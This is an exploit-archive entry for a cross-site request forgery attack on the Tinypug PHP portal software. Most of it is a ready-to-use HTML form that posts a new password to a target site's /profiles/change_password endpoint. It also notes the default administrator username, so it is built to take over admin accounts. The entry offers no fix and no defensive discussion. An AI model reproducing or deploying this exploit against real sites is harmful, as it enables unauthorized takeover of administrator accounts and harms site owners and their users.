Tinypug CSRF Password Change

2010-02-23T00:00:00
ID 1337DAY-ID-11042
Type zdt
Reporter ViRuSMaN
Modified 2010-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================
Tinypug CSRF Password Change
============================

==============================================================================
        [»] ~ Note : [ Default Username Of Admin : Administrator ]
==============================================================================
        [»] Tinypug Remote Change Password Exploit
==============================================================================
 
    [»] Script:             [ Tinypug ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ Tinypug is a system for building portals that enable innovation communities and customer inquiry. ]
    [»] Download:           [ http://code.google.com/p/tinypug/ ]

###########################################################################
 
===[ Exploit ]===
 
<html>
<head>
<title>Tinypug Remote Change Admin Password Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action="http://[site]/profiles/change_password" method="post" id="the_form">
<div class='frmrow'>
<label for="password">New Password: </label>
<input type="password" name="password" value=""  />    </div>
<div class='frmrow'>
<label for="password2">Enter Again To Confirm: </label>
<input type="password" name="password2" value=""  />    </div>
<div class='frmsubmit'>
<input type="submit" name="submit" value="Change Password"  /></div>
</form>
</body>
</html>
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2018-03-13]  #